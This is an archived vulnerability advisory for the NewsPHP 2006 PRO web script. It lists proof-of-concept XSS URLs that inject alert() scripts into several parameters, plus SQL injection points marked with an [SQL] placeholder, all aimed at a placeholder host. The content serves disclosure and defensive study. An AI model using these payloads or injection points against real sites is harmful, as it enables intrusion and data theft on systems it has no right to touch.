Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-3396.htm

NewsPHP 2006 PRO XSS SQL injection Vulnerability



NewsPHP 2006 PRO XSS SQL injection Vulnerability
NewsPHP 2006 PRO XSS SQL injection Vulnerability



http://newsphp.com=0D 
------------------=0D
Cross Site Scripting (XSS)=0D
------------------=0D
http://target.xx/?words=%3Cscript%3Ealert(/Ellipsis%20Security%20Test/)%3C/script%3E&where=1=0D 
http://target.xx/index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E=0D 
http://target.xx/index.php?cat_id='%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E=0D 
http://target.xx/index.php?cat_id=Business&tim=%22%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E=0D 
http://target.xx/index.php?tim=%22%3E%3Cscript%3Ealert('Ellipsis%20Security%20Test')%3C/script%3E=0D 
http://target.xx/index.php?id=%3Cimg%20src=javascript:alert(%22EllipsisSecuritTest%22)%3E=0D 
-------------=0D
SQL injection=0D
-------------=0D
http://target.xx/?words='[SQL]=0D 
http://target.xx/?words=%27[SQL]&where=1=0D 
http://target.xx/index.php?id='[SQL]=0D 
http://target.xx/index.php?topmenuitem='[SQL]=0D 
http://target.xx/index.php?cat_id='[SQL]=0D 
http://target.xx/index.php?words='[SQL]&where=1=0D 
http://target.xx/inc/rss_feed.php?category='[SQL]&amount=10=0D 
-----------------=0D
Ellipsis Security=0D
http://ellsec.org 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH